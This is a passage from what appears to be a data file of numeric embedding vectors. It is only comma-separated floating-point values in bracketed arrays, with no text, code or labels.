0.0018253707,0.025630973,0.018903894,0.00083359785,0.00047091948,0.0024580876,-0.019293657,0.0006242696,-0.009848408,-0.031753104,0.0023801643,0.022149244,-0.0038633058,0.00016906887,-0.043926965,-0.029970502,-0.009889919,-0.0054711117,-0.026063517,-0.034524016,-0.0013744278,0.0061409944,0.017710576,0.002637352,-0.0070130546,0.0014261287,-0.004446338,0.006839381,0.010716482,0.001769782,-0.0019520783,0.016920714,0.007930531,0.00018650663,0.0006957498,-0.0019505383,0.0012616627,-0.03110469,0.0009242305,-0.006057132,0.00571337,-0.013024105,0.0021341362,-0.015022933,0.014859602,0.0052903374,-0.037489492,0.016084677,-0.0032727881,0.00020331454,0.009656888,0.01881394,0.013352674,-0.004864004,-0.052871045,0.008788791,0.040545356,-0.0056356383,-0.029590398,0.009062119,-0.016696118,-0.046825685,-0.032907493,0.02687784,-0.008694951,-0.021690335,-0.0135939,0.00083057926,-0.009435349,-0.010727251,-0.010943456,0.01031604,0.0105885,-0.008820806,0.03622101,0.004404679,-0.0026813454,0.015086855,0.0037085318,-0.021460066,-0.006778238,0.006218521,0.00872829,0.0018788748,0.0051105064,0.0133081125,-0.022362333,0.0067856144,-0.0022183284,0.01316142,-0.002299535,0.013364588,-0.011529998,-0.019933326,-0.01227588,0.020097168,0.0077572274,0.0112435855,-0.012112581,-0.0070099435,0.011089478,-0.0025093742,0.13700646,0.011467566,-0.0023726325,-0.0054698368,-0.01832992,-0.0055544875,-0.003910105,0.012023187,-0.006673203,-0.006073454,0.007822588,-0.008974317,0.014518514,0.019473935,-0.003163827,-0.027272426,0.013022354,0.09640479,0.01606031,0.02277479,0.0014711907,-0.0033408005,0.04501436,0.015582582,0.0013331064,-0.054204114,0.0017934067,-0.03951147,0.02894533,0.014767335,0.00450951,0.0013758922,-0.0015795463,0.013559811,-0.0068808137,0.009327436,-0.017696228,0.00459124,-0.03580311,-0.003335582,0.015805535,-0.02115819,-0.013531717,0.0140146585,-0.015372331,0.011231454,-0.0070836577,-0.008626045,0.016848376,0.026496364,0.030422965,-0.014270633,0.0027295747,-0.010246228,0.008943477,-0.0026769082,0.011223348,0.014599081,-0.01605044,0.018395947,0.026496625,0.017679917,-0.0051251645,0.012193112,-0.008504243,-0.005854166,0.0057090316,-0.0037111167,-0.0018225729,-0.0052155913,-0.002660673,-0.00083221303,-0.03018896,0.0099815335,-0.0015556439,0.0073550837,-0.0026875413,-0.018815458,0.01823552,-0.006283619,0.02776496,0.037960187,-0.022536403,-0.0002033482,0.027364183,0.027959295,0.016416147,-0.0036923399,-0.008390617,-0.0047165807,-0.012918273,0.010292626,-0.0063015227,-0.0047148336,-0.017755426,0.015978834,0.0052621826,-0.003621924,0.0029611643,-0.0066535743,-0.023537714,0.024400484,0.009501603,0.019808628,-0.01334411,0.019388549,-0.025087202,-0.015371767,0.0016078847,-0.0017687144,0.021747123,-0.0009888924,-0.0025414757,0.0001871426,-0.009667578,-0.019081406,0.010397811,0.014516831,-0.028666578,-0.003394786,0.009930293,-0.000584763,0.026432306,-0.00053022313,-0.0066251173,-0.0036195926,0.00995412,-0.007022647,-0.02706482,-0.011371053,-0.0021238886,-0.003115556,0.038682822,-0.033657324,0.015037315,-0.022789368,0.016976325,-0.022109266,-0.008185681,-0.0030465198,-0.008481948,0.005771868,0.016793918,0.011985812,-0.027042743,-0.00003596876,-0.012801618,-0.017165404],[-0.016720286,0.006743382,-0.0009033181,-0.015061022,-0.0072292965,-0.010503329,-0.006425889,0.012971227,0.017232055,-0.007992192,-0.0007012034,0.04477161,-0.009215675,0.013984583,-0.013901962,0.0015201124,0.00632073,0.0024424302,0.014174064,-0.0019920573,0.014907876,-0.015671594,0.019937363,-0.013379083,0.020878438,0.018287936,0.003575011,-0.003354737,-0.0029383514,-0.0031995266,0.019307947,0.019461568,-0.004417488,-0.020454273,0.022647426,0.022577832,-0.013472068,-0.008592332,0.009870056,-0.012360507,0.0017893462,0.0069380663,-0.008351416,0.008828331,-0.015607423,-0.020634437,-0.0116176205,0.003638378,-0.02555916,0.018758459,-0.0008712527,-0.007872646,-0.01906079,0.025911788,-0.021741308,0.013612308,-0.016336054,-0.049088374,0.00985348,-0.007907517,-0.012407633,0.020360924,0.0027776463,-0.0020317445,0.018236455,-0.002807344,0.009361427,-0.015251646,-0.022802735,-0.020133277,0.01392734,-0.025500627,0.0060825334,-0.0047030183,-0.00066807074,0.021233255,-0.009102639,-0.0071657603,-0.010665197,-0.005653315,-0.037391856,0.011824612,0.013765192,-0.019781359,0.0031579891,-0.0011363105,-0.020000545,-0.01714448,0.0023842556,0.0027204591,-0.010509028,-0.0009967262,0.006106446,0.0073116994,-0.008321678,0.0046615233,0.021945305,-0.016000425,-0.005022491,-0.008942763,0.0042535295,-0.010011852,-0.020144098,0.016243694,0.010353963,-0.021673355,-0.011655706,-0.007136108,0.00856629,-0.0078100245,0.0004613172,0.001376441,-0.0021279182,-0.000017873896,0.01391708,-0.0080319755,-0.002027069,0.006227855,-0.014783027,0.0014823638,-0.0023270235,0.018217666,0.010327217,-0.005893279,-0.0046029887,-0.00030569534,-0.011599639,0.0145105375,0.0023286117,-0.0075085685,-0.0062808404,-0.000034622717,0.0013940803,-0.0076223225,-0.01635171,-0.007779874,0.001707915,-0.004347601,0.010095499,-0.020878868,0.015017329,0.004027596,0.03273249,0.014294879,0.018834332,0.016125917,0.0021971785,0.018671468,0.017855084,0.001772726,0.030820008,0.008345531,0.0052620536,0.0009881358,0.0033622056,0.0037522751,-0.016399017,-0.027464617,-0.0017299472,0.0096361805,0.013840571,0.0154286465,0.0019481028,0.016960612,-0.0039298953,-0.0137860915,-0.003756805,-0.0076894183,0.0031318297,-0.010858823,0.005193244,0.016038056,0.008945566,0.0058128634,0.00086064916,-0.006197162,0.0051974044,-0.005835019,0.006410461,0.012268869,-0.010027406,0.030020384,0.008767038,-0.01507431,0.011079028,0.028610695,0.022238338,0.012276598,0.0047474606,0.0040782397,-0.0050759423,-0.020449646,0.0064261397,-0.0019141855,-0.014908812,-0.00995137,-0.011280451,0.14018741,-0.020661714,-0.000450822,-0.0070384378,-0.013483841,0.013846459,-0.024952436,-0.006676486,-0.027130265,-0.009412384,0.015461237,0.02344579,-0.0057079485,0.007823034,-0.011295454,0.003415662,0.0012348613,0.010349504,-0.07090449,-0.0041395277,0.02827116,-0.015479038,0.014478909,0.015530874,0.0015332537,-0.004156317,-0.016404686,-0.0063598882,0.013387118,0.020920811,0.01732751,0.004270695,-0.027029203,0.0130058685,0.010706826,-0.031024273,-0.0076580835,-0.014525252,-0.02080139,-0.0016503488,-0.0039483476,0.0072737117,-0.013015596,-0.024438579,0.010741012,0.007822133,0.011677654,0.0033340312,-0.0023634594,0.0021933212,-0.011652029,0.015874278,-0.00091989216,0.00080564583,-0.0018528522,0.01438774,0.022631865,-0.0048642387,-0.018717777,-0.019758252,0.0026574791,0.0075536566,0.0138477385,0.02021058,0.02976771,-0.01326391,0.00631801,0.021841224,0.009324791,0.002578046,-0.04308641,-0.004255136,-0.011042246,-0.051773567,0.009464883,0.007342442,-0.021064319,0.009823903,0.007044499,0.028982649,0.014023512,0.009491034,-0.008919899,-0.0044949646,0.009467584,-0.006505701,-0.017632069,-0.03370192,-0.010906305,0.009528186,0.009737957,0.020918563,-0.0011437437,-0.023674892,-0.002034824,0.0325748,0.012636223,-0.00963089,-0.019084733,-0.015446777,0.024518056,0.007218216,-0.0060027954,-0.0060833287,-0.009814514,0.019546106,-0.0007553073,0.001169672,0.0049650995,-0.0017838324,0.029476464,0.0145616215,0.01187948,-0.0041093053,-0.015665516,-0.022502674,0.013466782,-0.0052820607,0.005944759,0.012452901,-0.019487662,-0.010406727,-0.0029456303,0.01705727,0.00011552602,-0.010149285,-0.006212086,0.006658617,-0.0027586343,0.026048476,0.0064762225,0.020280933,0.004375763,0.0103419935,0.0076032747,0.018278036,0.012855152,-0.021548273,0.0010433171,-0.0005883322,-0.008332739,0.010832415,0.0125437975,-0.006073631,-0.008877967,-0.021873143,0.019270046,-0.0012762998,-0.0055917418,-0.0068763313,-0.013149854,0.01339277,0.00004114478,0.004410959,-0.014548293,-0.031007009,-0.01246901,-0.00042508933,0.0032320048,-0.005805472,-0.019759692,-0.01150133,-0.0049772207,0.017724825,-0.000019882016,0.011770535,-0.0004505472,0.063231714,-0.009361001,0.002765632,0.010795192,-0.021186383,-0.018346855,0.03286186,0.017568963,-0.0007215067,-0.01620962,-0.005264919,-0.013417778,0.0106387045,0.007958964,-0.024573293,-0.0012635426,-0.019654607,0.01498849,-0.027341733,-0.014848257,0.029148174,-0.030436816,-0.005158861,0.014776442,0.016219746,0.0045104004,-0.0019408131,-0.0050479444,-0.013654115,-0.017786799,-0.018961677,-0.009232304,-0.019978583,-0.0023741152,-0.032293458,0.0065004616,-0.0025843915,-0.0032173449,-0.011931376,-0.005329925,-0.008927075,-0.0026271802,-0.019065343,-0.0061055007,-0.018095987,0.0207292,0.033694178,-0.00040148463,-0.0069822655,0.00096431794,-0.0052303104,0.020842398,-0.02111386,0.014722066,-0.039606806,0.005585107,0.018403877,-0.016855398,0.02125198,0.02836481,0.02189274,0.025010578,-0.017851729,-0.015508854,-0.0030543588,0.04833161,-0.013507712,-0.012214992,0.011997855,-0.010967193,0.01012738,0.026977759,-0.00019798825,0.008228455,-0.0025393763,0.009001536,-0.004252055,-0.012206904,-0.017284896,0.00005051645,-0.0038659226,0.0032784587,-0.0041656066,0.0051704235,-0.028732931,0.0037478444,0.007767449,0.0060226973,0.017407859,-0.0055918084,0.012615517,0.016348597,0.023164965,-0.009815952,0.025314664,0.006819083,0.043823473,-0.00459681,-0.0010943494,0.025015784,-0.013747229,0.008398365,-0.012085749,-0.0047117043,0.0021486008,-0.0046438696,-0.0024658751,-0.009017304,-0.0070039504,0.0389665,-0.0128448475,0.0013147966,-0.01867978,-0.008128511,0.017990006,-0.0100178495,0.0006743239,-0.00040511932,-0.010423473,0.0092331655,0.023332477,0.005083933,0.0041553173,0.014981386,-0.021636648,0.016354453,0.0052351654,0.0031213637,0.004719114,0.019378647,0.015298145,0.011308345,0.010405252,-0.0424068,-0.0028751763,-0.0042281323,0.009992281,-0.015277941,0.03769614,0.008587755,-0.008953634,0.0036488136,0.02353084,0.010369803,0.00035657734,0.018785411,0.028297838,-0.0043242024,0.013865203,0.005132372,-0.0043266127,-0.0120357275,-0.00030605664,-0.0019469276,-0.009821006,-0.0016549585,0.0072260424,-0.015251757,-0.034044087,-0.005278499,0.04970181,-0.048656803,0.026270987,-0.010590873,-0.019673081,0.008415438,-0.005597938,0.081458196,-0.0043862155,-0.007402251,-0.0031830547,0.012236774,-0.024769763,-0.0024086891,-0.0025371248,-0.014856537,-0.007970725,0.018671436,0.018653847,0.019013012,0.036236685,-0.004507079,-0.001393654,-0.004875849,0.00006148145,-0.005966288,-0.003195837,0.0007293775,-0.006734478,-0.010928628,-0.035210934,-0.016009904,0.0031404113,0.025674276,0.021055836,0.011010471,0.0038320099,-0.013562762,0.014657388,0.008921901,-0.0077794194,0.010696723,0.019835135,0.013145435,0.0013824989,-0.008081172,0.019663753,0.0183579,-0.011304383,0.0073208697,0.027791234,0.00752785,-0.025357699,-0.021473737,0.016314536,0.006040641,-0.012020524,-0.026477242,0.021181293,0.020825047,-0.0052176374,-0.0039986223,-0.016074501,0.0014058169,0.016873376,-0.015065205,-0.00097389804,-0.010267333,-0.004362036,-0.01359769,-0.03701513,-0.008233015,0.0060694534,0.01448241,-0.0062507433,-0.009700883,-0.025494594,0.01654892,0.009520459,0.0059107025,-0.013758497,-0.000026670488,-0.0043056975,0.018562473,0.025733778,0.008952091,-0.0028099378,-0.0009325045,0.016321538,0.010486855,-0.009305724,0.010240611,0.02514505,-0.0054428396,0.016608708,-0.0034519278,-0.02287368,0.005747897,0.0093538035,0.011442149,0.0005271888,0.017482264,0.029291634,0.0016514566,-0.00994269,-0.005068965,-0.002600494,-0.021483272,-0.036146015,-0.023931334,0.033872932,0.0049625863,0.009663081,-0.011307269,-0.0011824819,0.022551168,-0.016451309,-0.006988848,-0.06273795,0.0050656837,0.011245411,0.02040774,-0.01943004,0.040682256,-0.028472565,-0.0045278394,0.015570727,-0.022256045,-0.010215779,-0.004639378,0.014479293,0.004118331,0.022425557,0.016332174,-0.013701426,-0.018263971,-0.017112516,-0.038666364,0.007827752,0.02281473,-0.007381594,0.0084500555,0.0066900016,0.015696947,-0.01641732,-0.0031202228,0.0112554375,-0.018304996,0.0053183176,0.019359883,-0.002239534,-0.018305536,0.0027959393,0.002936125,-0.009517847,0.0010095999,-0.009428469,-0.000322356,0.030859895,-0.015264335,-0.004622302,0.0074267085,-0.019897982,0.013647498,-0.014691923,-0.007997191,0.002463645,0.024780536,-0.0040539373,0.004244235,-0.005425331,0.0014143763,0.025016125,-0.003441246,0.010794665,0.027127055,-0.009717826,0.022585854,-0.009060782,0.002040949,-0.0042190137,-0.01646168,0.017125227,0.008794198,0.013423668,-0.010044839,0.0066500697,0.0024505882,0.004822924,0.02007548,0.009809962,0.012954438,0.012036069,0.0023074301,0.009867692,0.024980832,-0.0028047694,-0.0006434968,-0.0057077194,-0.02975755,-0.014626845,-0.000932243,0.0027006133,-0.022731405,0.006536252,-0.0030985945,0.003700577,-0.0066121314,-0.003398758,-0.0043823067,-0.026503148,0.0129641555,0.0075774454,0.0015364419,-0.019887885,-0.039880738,-0.01905511,0.022440737,0.014899657,-0.028567703,-0.021545466,-0.003851147,-0.00016668119,-0.003426377,-0.018094191,-0.020850567,-0.007038746,0.0114960885,-0.005233452,0.015099404,0.0073624193,0.006557406,0.017979488,0.015560941,-0.03354904,0.029752547,0.00024171578,-0.016179863,0.005717613,0.017978424,0.01113919,-0.016310832,0.0019983372,0.0068164677,-0.0013972527,-0.008302194,-0.0007090235,0.023762874,0.04260175,0.01013821,-0.020727849,0.0066413493,-0.024313409,-0.018661559,0.014558117,-0.014401585,-0.018995486,-0.0038746453,0.0030064124,-0.007265241,0.009479144,-0.020082066,0.03673905,0.0004537626,-0.001972846,0.0030706606,-0.009437357,0.0077346913,0.01774186,0.0027378926,-0.018844513,-0.00043697344,-0.012771191,0.04104094,0.0014844697,-0.0048371535,0.0074022287,-0.006262298,-0.0175868,-0.0029297266,0.002760715,-0.022994608,0.0014438392,0.009529267,-0.04600044,0.016094677,-0.008255899,0.0010556347,-0.0005875765,0.004921569,-0.012947412,-0.0046170666,0.0006762863,-0.022150828,-0.03354969,0.015886724,0.016665228,-0.015003125,-0.0038583868,-0.01230282,-0.032935314,-0.0063123475,-0.022673285,0.0023364907,0.017985934,-0.0015759767,0.011872362,-0.002747937,0.014865427,-0.0069071813,0.02435557,-0.029335102,-0.021227138,0.0034544833,0.0014076337,0.025858853,0.0028541498,0.0044716415,0.040297836,0.0027617028,-0.024100548,0.022521097,0.0031856324,-0.010427535,-0.018698486,-0.006527699,-0.007015775,0.006696462,0.009033464,-0.0014138609,0.015228387,0.019774798,0.01389695,0.0037648883,0.014271016,-0.009169538,-0.020301998,0.017468816,0.017681511,-0.017530307,0.008428641,-0.00023485077,0.0053084707,-0.00058106263,0.002169874,0.026831286,-0.0026839215,0.013508904,0.0005268436,0.004048025,-0.0047726035,-0.015453784,0.0011162696,0.0005770583,0.007365832,-0.006531852,0.0010157694,0.017946612,0.020332849,0.02409034,-0.0047887075,0.011059673,-0.0029514986,0.0010966178,0.010892245,-0.011609139,-0.024540111,-0.016605498,0.0151153365,-0.043036908,0.002056172,-0.009346331,-0.013776037,0.0110629145,-0.014858253,-0.005305513,-0.021415077,-0.010193557,0.015113906,0.002664898,0.0025285867,-0.0017968431,0.013973908,0.018347442,0.014689307,-0.0073869056,-0.0005774226,0.044072255,0.004481638,0.013796929,0.006679878,0.014087537,0.006110475,-0.0027156866,-0.011364584,-0.015404081,0.02007859,0.008197432,0.019516593,0.03809241,0.027244492,-0.017353619,-0.00009225567,-0.030551553,-0.00913311,0.036196675,-0.0058457563,0.00367723,-0.0060287723,0.03727061,0.010368741,-0.022496577,0.011557849,-0.02319756,-0.040731635,0.021656716,0.020747468,-0.026349328,0.0061300094,0.016058741,0.0034248247,-0.014383872,0.03390138,-0.003084656,0.016701825,0.00039055044,0.0034874885,-0.0025164303,0.0027132751,-0.025329402,-0.02259149,0.03451268,0.03205951,0.02107682,-0.013146456,0.0012547604,0.013069146,-0.004234609,-0.0061711394,-0.010357455,0.0014592108,0.0073062456,-0.028740907,0.0067621777,0.0030393412,0.0065521053,-0.0076405797,0.016320385,-0.013000753,-0.014782967,0.022493273,0.012522167,-0.015899949,-0.0056000217,-0.017610088,0.00041632215,-0.0041243434,0.0116858585,-0.024896428,-0.0034042634,0.006947516,-0.025947232,-0.01664548,-0.010213298,0.018425336,-0.022905394,0.012766649,0.024933696,0.018614056,0.017345533,-0.011767568,0.0092101125,0.0038369384,-0.008685406,0.0067546894,-0.0045157275,0.008755291,0.008400954,-0.01469134,-0.011835246,0.0017231291,0.0007373228,0.0071534845,-0.017984906,-0.0076120696,-0.0060411994,-0.009728853,0.0070585134,-0.0041769166,0.020285072,0.0059401533,0.0018731343,-0.0064423173,-0.0037921253,-0.004998624,0.00759458,-0.0075831697,0.0019564051,-0.034462232,0.019603102,-0.0022293457,0.0062290556,0.012767168,-0.031186456,-0.0017581054,0.013595705,-0.014604699,0.020699294,-0.016029982,0.026848396,0.0129364375,0.021487748,0.008003658,-0.0039295233,0.017634088,0.0035696016,-0.012451391,0.021483777,-0.0071803797,0.00044883275,-0.014327364,-0.027448434,0.022014515,0.008286007,-0.0077731754,-0.006889947,-0.010596167,0.022626089,0.027731284,-0.001473878,-0.009421522,0.02266562,0.036505233,-0.017396258,0.008386066,-0.021421188,0.010553053,-0.0029021734,0.00038217453,0.004372595,0.025830248,0.0062185777,-0.023068422,0.012278179,-0.000012724811,0.0074650547,-0.019903973,-0.008410701,0.021309413,-0.012050116,-0.0052849078,0.0031590895,0.004354457,0.010672488,-0.003452633,-0.015747614,-0.02242126,-0.0033135815,-0.015774025,-0.011536816,-0.03088927,0.001689277,0.01527353,0.033584103,-0.01300875,-0.027804838,0.0057918173,-0.0031915964,-0.00067516795,0.018194066,-0.003287058,-0.010870147,0.002767008,0.016936501,-0.025303159,-0.021943785,0.0045572645,-0.012017989,-0.027310895,0.00037343183,-0.01671468,0.01603116,-0.014223564,0.009312929,0.010630287,-0.011092065,-0.0014987091,0.028054085,0.023176355,0.0035107306,0.022019014,0.01562019,-0.019516144,0.0077995183,-0.001355138,0.035946395,0.008328594,-0.0001533999,0.013741281,-0.004353857,-0.010301755,0.009486786,-0.021963475,-0.014034692,0.00034794462,0.022672404,-0.00059043133,0.010497031,-0.028438747,0.0070763966,-0.01799516,0.005552477,-0.008268017,-0.008012764,-0.006347021,0.040243246,0.0049796468,-0.012483272,-0.022488013,0.000025418472,0.0080474,-0.02129422,0.0021804415,0.0037840595,-0.010474082,-0.008664362,-0.02734463,0.0024677983,-0.020236889,-0.02322423,-0.019618338,-0.015647497,0.02373446,-0.01817964,0.011778351,0.0012477371,0.014543464,-0.0030565297,0.0042345296,-0.028923383,0.016267553,-0.01612837,0.013168778,0.019206524,0.0080949785,-0.016166145,0.020421956,-0.0014089766,-0.018488409,0.025366481,-0.0043968703,-0.0034201143,-0.0097660115,-0.038848795,0.009637228,0.013668712,-0.009048843,0.0028472983,0.0075998493,0.02372116,0.01248079,-0.0014688167,0.008963155,0.0052857175,0.003000593,-0.0068392726,0.0015769198,-0.012869894,-0.019304026,0.00031132417,-0.010977889,-0.006566141,-0.011176062,0.0005515534,0.011198856,-0.007235315,0.00898516,0.0018060474,0.025668131,-0.007159669,0.033941463,0.019254597,0.010751306,-0.004154285,-0.0015507621,0.010956035,0.012545092,-0.0020418218,-0.0044687535,-0.011702215,-0.019495916,-0.011838452,0.02601712,0.0065341904,0.00015711074,-0.010030759,0.007315453,-0.012024272,-0.0010539962,0.027874079,0.0024052232,-0.018390572,0.02775544,-0.019004341,0.004053131,0.0014461883,-0.013448256,0.010088884,0.0019166077,-0.0059454986,0.0037782614,0.0060086474,0.016202964,-0.013147671,0.030211369,-0.015683547,-0.00818705,-0.036285486,0.0143965315,-0.004233608,0.01578781,0.012809735,0.009960408,-0.015374471,-0.026424622,-0.01553107,0.02216068,-0.024739431,0.0053976877,-0.013860311,0.015073723,0.019640233,-0.004616291,-0.008291228,0.012804228,0.008977077,-0.007591785,0.013392378,-0.016118627,0.017033212,0.010694756,-0.002343346,-0.01187814,-0.0102753,0.0054939375,-0.0033572672,-0.021260845,0.008740379,-0.010134988,0.012868115,0.016525153,-0.0036716536,-0.012628185,0.014972551,0.01058181,-0.0070787356,0.069731146,0.0022828132,0.004211148,0.0005676241,-0.0064184447,0.012384782,0.025188252,-0.0037653868,0.018192593,0.021439746,-0.005351664,0.012631869,0.006167642,0.028019717,-0.00005190881,0.014556867,0.028394178,-0.009328045,0.013023573,0.0097975675,-0.011674085,0.02135333,-0.020779395,-0.0060329554,0.0084134145,-0.014628145,0.01759889,-0.0283264,-0.028483808,-0.008246964,-0.012060731,-0.038589954,0.0049592988,-0.008042386,0.029364113,-0.020420877,0.005749199,-0.0023558647,0.0037326457,-0.011459064,0.023670355,-0.008940909,-0.009323682,0.0052153645,0.019110456,-0.013049644,0.09105318,0.022463383,0.034495085,-0.02118007,0.00824381,0.027506828,-0.009387756,0.015968524,0.013911012,0.008448527,0.014096009,0.03630589,-0.0034764633,0.010193824,0.018347204,-0.0030180772,-0.021524852,-0.008051839,0.01644961,-0.009897459,-0.009218513,-0.01212193,0.016507244,-0.014667676,0.010654931,0.0062763547,0.0080125965,0.025034243,0.0137112755,-0.02322851,-0.008547951,0.009627027,0.011186564,0.03635793,0.017789027,-0.04660199,0.012598015,0.17655888,0.00831951,0.012323839,0.0040004463,-0.01194964,0.0029410308,-0.0913045,0.007771477,-0.0043258625,-0.014476086,-0.0037921716,-0.0029800562,-0.0074708248,0.015506322,0.012366076,0.031160552,0.0045010205,-0.050532933,0.01695512,-0.01976159,0.0021631643,0.016212814,0.009020165,0.011102807,-0.021414688,-0.00473759,0.013342594,-0.0081264805,-0.011709844,-0.011721293,0.0028819127,-0.027355637,-0.008590454,0.01190895,-0.019382736,0.016295897,0.01335256,0.023122206,0.007253559,-0.03817789,0.0045922915,0.0015327658,-0.017957462,-0.038755618,-0.17003351,0.010316792,0.004452079,-0.03684962,0.027285928,0.005827695,0.0066662827,-0.006987908,0.0026262694,-0.018214094,0.010912208,0.020588439,-0.018312024,0.015064678,-0.017516486,0.0028656279,-0.001987388,0.006229784,-0.0018931613,-0.0026612075,0.0053008054,0.0001369806,-0.026348094,-0.012788457,0.0039167195,-0.0035025931,-0.013910284,0.009389115,-0.001705567,0.02215423,-0.021920472,0.019287962,0.0020213404,-0.006634255,-0.010859747,-0.016712327,-0.011512392,0.005116655,-0.017917622,0.017430663,0.010505377,-0.0059363935,0.0144764,0.0038661333,0.010477936,0.012789897,0.023814572,0.020082531,0.010858515,0.0058567435,0.020201435,0.0017460424,-0.03521948,0.0038291195,0.0011746912,0.007916099,-0.010946406,-0.006433683,-0.010337579,0.013246018,-0.007676181,-0.012720051,-0.017180538,-0.020127596,0.015708547,-0.010843098,-0.00061766733,-0.020045858,-0.007318104,-0.01458546,0.0033158758,0.0007927188,0.015864158,-0.017902942,0.018961126,0.024862379,-0.020438073,0.0132314265,0.022707522,0.009988679,-0.018188179,-0.008677266,-0.0021979602,-0.016013794,-0.0008038476,0.014644753,0.009989859,-0.019958638,0.0034450544,-0.013356749,0.012554041,0.0025581606,0.02129656,0.01926923,-0.0068738125,0.0038854058,0.010005084,0.010313068,-0.021285556,0.008487099,0.0010335308,-0.009182915,-0.015264063,0.0082438355,-0.027931156,0.0028917543,-0.015713641,-0.008982179,-0.021241978,0.0013244009,-0.02221927,-0.0053322515,0.0032775328,-0.0024813144,-0.035670094,-0.03206188,0.03366968,-0.0032333727,-0.011760491,-0.020869866,-0.03850383,-0.013285449,0.002505283,0.011674675,0.045167495,0.017734477,-0.037311584,0.008258002,0.008222859,-0.019151647,-0.015746834,0.0067650788,0.008179304,0.018760234,0.015780367,0.019628454,-0.015654493,-0.009108634,-0.037094288,0.00090882665,0.013543859,-0.013121546,-0.0076724743,-0.024507154,0.024154708,-0.002164046,0.03481873,-0.009696771,0.01774754,-0.009574409,-0.0012956503,0.04476128,-0.00409122,-0.028247891,-0.011700628,0.08465759,-0.015024111,-0.01919813,0.004359621,-0.0022893667,0.008154972,0.01842674,-0.009048138,-0.004202351,-0.019094944,-0.02517509,-0.0023263576,-0.020705258,0.0148532875,-0.011000823,0.01894959,0.004920231,0.01909771,0.002623172,0.005908455,0.012274735,-0.013026287,-0.0063681942,0.03544956,0.016042888,-0.014098278,-0.0027465231,0.0031249928,-0.013942651,-0.027720513,-0.016541574,0.0020228236,-0.002360592,-0.0011558036,0.0099402545,-0.048660573,-0.025009427,-0.000013615955,0.009076848,0.0020972476,0.017422937,0.0052138222,0.011082527,-0.017774504,0.010767391,-0.00085512036,-0.021657897,0.0060764533,-0.010831394,-0.0139498655,0.009756564,0.01032794,0.00081933447,-0.026285585,0.0003016152,-0.02914692,0.0048826276,-0.0068417797,-0.005432809,0.0075883875,0.00790375,-0.0071579516,-0.027524132,-0.013917308,-0.009878607,0.0066472967,0.0017121303,-0.0016753485,0.009517761,0.022780823,-0.015144344,0.015449244,-0.0050709345,0.0226822,-0.0036919948,-0.0027063238,-0.008852742,0.011310579,-0.026029428,-0.0063243667,-0.0032146128,0.0056646424,0.0052779983,-0.0010750163,-0.024945829,-0.05418638,-0.007154396,0.025987597,-0.032658316,0.007857798,0.0022499273,0.013921555,0.034723315,0.0007378949,0.01017578,0.0036477037,0.005719329,-0.003966035,-0.00882655,0.00096251915,0.009803319,0.027324386,-0.019564087,-0.017896956,0.012128107,-0.020188551,-0.012716706,-0.020047413,0.007280906,-0.02654283,-0.004483002,-0.007459295,0.010893143,-0.005623183,-0.006197581,0.034306597,-0.02727982,0.007427995,0.005403681,-0.013858844,0.010870049,-0.013079631,-0.0004365694,-0.009196552,0.014269203,-0.014771314,-0.0006869827,0.02305003,-0.019181032,0.013989627,-0.0059482083,0.04025105,-0.010058292,0.003754464,0.0059021953,-0.0037666343,0.0155478865,0.004698824,0.009664728,0.020694088,-0.0067972364,0.0076459413,0.011398867,0.0048204735,-0.0027240636,0.019301018,0.018130759,-0.005886433,-0.0064896117,0.004180134,0.0009546707,0.0072736614,-0.008457828,0.0078009204,0.004338063,0.027218537,-0.032133363,0.0111316405,-0.0016634492,-0.0041305763,-0.005160233,0.017634813,0.022506498,-0.017905526,-0.017257852,0.0151483165,0.022588575,-0.007233428,0.020997906,0.0013187072,-0.011850659,-0.02049688,0.009382824,0.014279552,-0.0076185674,0.01970215,0.00972618,0.00016145005,-0.027636178,0.016245414,0.026889397,0.011420092,-0.014746813,-0.006068548,0.011974108,-0.0065250196,-0.012455697,0.03617718,-0.0087356055,-0.0069435593,-0.027811535,-0.0010386198,-0.006258922,-0.014577297,0.0010656686,-0.018305056,0.030318126,-0.016020507,0.015417502,0.0016199286,-0.01300389,0.04287583,-0.009140564,-0.032640573,0.018959062,-0.012294363,-0.020453542,-0.0025297422,-0.023524895,0.016043039,-0.021162912,-0.0048627974,-0.0020307293,0.02009396,0.004197604,-0.010446442,-0.008584298,0.01991643,-0.008893258,-0.015546192,0.0029457055,-0.0120824715,-0.0015946963,0.0054123392,-0.03204662,-0.0075130244,0.0038273477,0.06668272,-0.0014019867,-0.0010807655,0.01160895,0.029210227,0.029280042,-0.0036147018,0.01803666,-0.023211358,-0.015282401,-0.015796093,-0.028749693,0.01367105,0.00770226,-0.0010538957,-0.008928606,0.0054662046,-0.0011685245,-0.0015294552,-0.012500402,-0.018840007,-0.014853501,0.021494335,-0.0020344367,-0.0088546295,-0.03673343,-0.0021451479,0.023322059,-0.010533978,0.013332853,-0.021392215,-0.02143116,-0.02370991,-0.019154895,-0.006675427,-0.005336239,0.008080684,-0.0071186866,-0.0017284249,-0.008632554,0.009165487,0.0034772104,0.009533209,-0.013403809,-0.01905339,-0.0108516365,0.027622344,0.002642765,-0.008546809,-0.010020773,-0.00080786867,0.015854027,-0.007327539,0.0020059303,0.0016484255,0.025431732,-0.013197697,-0.023963641,0.0152919525,0.015737023,0.005094922,-0.020387134,-0.0087278085,-0.0068399175,0.032385115,0.012222305,-0.000076530196,-0.021529539,-0.0047913482,0.018980589,-0.032213327,0.028900515,0.0087462915,0.010425269,0.006691141,0.008480107,0.01415569,0.010029627,-0.010891552,-0.006803111,-0.0028913144,0.013543263,-0.016204651,-0.003686653,0.0005326017,0.0071401824,-0.0023858757,-0.014357591,-0.01462352,0.01176979,0.03046639,0.0018664293,-0.013692961,-0.021813879,-0.0041336534,-0.0100887045,0.0023112511,-0.00414293,0.009245033,-0.034935206,0.005156366,-0.0036317194,0.0010007416,-0.016032564,-0.006984267,-0.0003868287,-0.09073906,0.020387335,-0.008190593,-0.024953045,0.0009347106,-0.0037902808,0.01989066,0.06760917,0.020721,-0.03836713,0.0054628677,0.012901786,0.019663628,-0.0056266035,-0.012309656,0.013307662,0.0075109266,-0.014564345,-0.0119201215,0.019062953,0.009182846,0.0073175933,0.0070675756,-0.0064785453,-0.009028371,0.038216904,-0.015130174,0.019008657,0.010338211,0.015581422,0.01292598,-0.007242071,0.014174722,0.0017710866,-0.004388203,-0.0018907937,-0.020084232,0.006627701,0.0139712915,-0.009616894,0.0014674771,-0.0047764885,-0.015953785,0.016010823,0.014213529,-0.00007509553,0.0208959,-0.0030227501,0.017494345,0.007646956,-0.004357716,-0.0017629496,0.017631775,-0.005314647,-0.013097988,-0.013763303,-0.01645261,0.025335658,0.007558421,0.0030366196,0.012875637,0.018073378,0